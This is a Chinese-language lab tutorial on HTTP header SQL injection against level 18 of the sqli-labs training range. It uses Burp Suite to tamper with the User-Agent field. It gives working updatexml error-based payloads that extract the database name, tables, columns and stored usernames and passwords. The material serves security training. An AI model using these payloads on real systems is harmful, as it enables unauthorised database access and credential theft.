HTTP头部注入
原理: 一般在通过获取头部的信息用于数据的分析,通过头部可以向数据库发送查询信息,所以构造恶意的语句结构就可以向数据库进行信息查询。本次HTTP头部注入实验将在sqlilabs靶场中的第十八题进行注入
- 此图片为sqlilabs靶场中第十八题中的php代码环境,从代码环境中,我们可以分析到对于Post注入方式,还是通过魔术引号的方式进行了防护,但是在红框中的代码却露出了马脚
$ uagent = $_SERVER [‘HTTP_USER_AGENT’]; $ IP = $_SERVER [‘REMOTE_ADDR’];
- 这两段代码中 $_SERVER是PHP中预定义变量符,可以获取头部信息,路径信息,IP信息。PHP文件中表示获取头部信息与当前主机ip信息
- 本题中注入的点应该是围绕着$ uagent头部信息进行注入。
数组元素 | 说明信息 |
---|
$_SERVER[‘SERVER_NAME’] | 当前运行脚本所在服务器的主机名。 | $_SERVER[‘SERVER_PROTOCOL’] | 请求页面时通信协议的名称和版本。例如:HTTP/1.0 | $_SERVER[‘SERVER_ADDR’] | 当前运行脚本所在服务器的 IP 地址 | $_SERVER[‘REQUEST_METHOD’] | 访问页面使用的请求方法。例如“GET”“HEAD”“POST”“PUT” | $_SERVER[‘REMOVE_ADDR’] | 浏览当前页面的用户 IP 地址,注意与 $_SERVER[‘SERVER_ADDR’] 的区别 | $_SERVER[‘SCRIPT_FILENAME’] | 当前执行脚本的绝对路径 | $_SERVER[‘SCRIPT_NAME’] | 包含当前脚本的路径 | $_SERVER[‘REQUEST_URI’] | URI 用来指定要访问的页面。例如,“index.html” | $_SERVER[‘DOCUMENT_ROOT’] | 当前运行脚本所在的文档根目录。在服务器配置文件中定义 | | |
![在这里插入图片描述](https://img-blog.csdnimg.cn/ccb4ea958a3542a89011c7da2b97d971.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5YWU5a2Q5ZGAfg==,size_20,color_FFFFFF,t_70,g_se,x_16) 3. 我们已经知道了http头部注入,从头部的内容拿到insert基于报错注入。
- insert语句:insert是在mysql数据库中作为放入字段数据的执行指令。
insert into member(username,pw,sex,phonenum,email,address) values(‘xx’,‘xx’,‘xx’,‘xx’,‘xx’,‘xx’,‘xx’,)
updatexml() : MYSQL对xml文档数据进行查询和修改的XPATH函数 updatexml(xml_document,XPathstring,new_value) :表名,路径(路径错误会报错),替换的值 extractvalue() :MYSQL对xml文档数据进行查询XPATH函数 floor() :MYSQL中用来取整的函数
- 我们使用burpsuite对第十八题进行抓包分析
- 打开burpsuite的Intercept is on开关
![在这里插入图片描述](https://img-blog.csdnimg.cn/15699e37a05d4d659962cf45e0e225a8.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5YWU5a2Q5ZGAfg==,size_20,color_FFFFFF,t_70,g_se,x_16) - 对十八题靶场中随便输入账户密码进行包的抓取
![在这里插入图片描述](https://img-blog.csdnimg.cn/41a4e16e41484a8e9a6c5f137319a1b2.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5YWU5a2Q5ZGAfg==,size_20,color_FFFFFF,t_70,g_se,x_16) - 右击保存在Repeater中进行编辑
![在这里插入图片描述](https://img-blog.csdnimg.cn/88938932e5214c4fa78ead5673c06317.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5YWU5a2Q5ZGAfg==,size_20,color_FFFFFF,t_70,g_se,x_16) ![在这里插入图片描述](https://img-blog.csdnimg.cn/817903127101461fb2e21052ef7f7355.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5YWU5a2Q5ZGAfg==,size_20,color_FFFFFF,t_70,g_se,x_16)
- 通过在User-Agent字段后面添加单引号查看是否有报错来判断是否存在注入点
- 如下图所示,在User-Agent后面添加后出现了报错,存在HTTP头部注入
![在这里插入图片描述](https://img-blog.csdnimg.cn/9c5bb1ae6ff04de4859ba8e16880eaa8.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5YWU5a2Q5ZGAfg==,size_20,color_FFFFFF,t_70,g_se,x_16)
- 通过报错注入发现数据库信息
- 使用payload构造,使用报错函数updatexml其中0X7e表示的是 ~ 这个符号 ,concat函数用于将两个字段拼接
’ or updatexml(1,concat(0x7e,(database())),1) ,’’,’’)# ’ or updatexml(1,concat(0x7e,(datebase())),1) or ‘1’='1 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2dbe5dc7207a492ba2d4fd5817365b30.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5YWU5a2Q5ZGAfg==,size_20,color_FFFFFF,t_70,g_se,x_16)
- 通过database()参数位置进行更改,查询到数据库下的所有表信息
’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)),1) ,’’,’’)# ![在这里插入图片描述](https://img-blog.csdnimg.cn/79dcff577efa47dd9ab6ad0561554ebf.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5YWU5a2Q5ZGAfg==,size_20,color_FFFFFF,t_70,g_se,x_16)
- 通过上一步中找到的所以表的信息,我们可以继续查询表下面所对应的字段名称
’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’)),1) ,’’,’’)# ![在这里插入图片描述](https://img-blog.csdnimg.cn/73a4baac784640e69fdf530efe9ac16a.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5YWU5a2Q5ZGAfg==,size_20,color_FFFFFF,t_70,g_se,x_16)
- 查询到了字段名称,也就相当于表中的数据我们也是可以手到擒来了
’ or updatexml(1,concat(0x7e,(select group_concat(username,password1) from users)),1) ,’’,’’)#
![在这里插入图片描述](https://img-blog.csdnimg.cn/7b23cd411a274242a2156a42619d0eb6.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5YWU5a2Q5ZGAfg==,size_20,color_FFFFFF,t_70,g_se,x_16)
|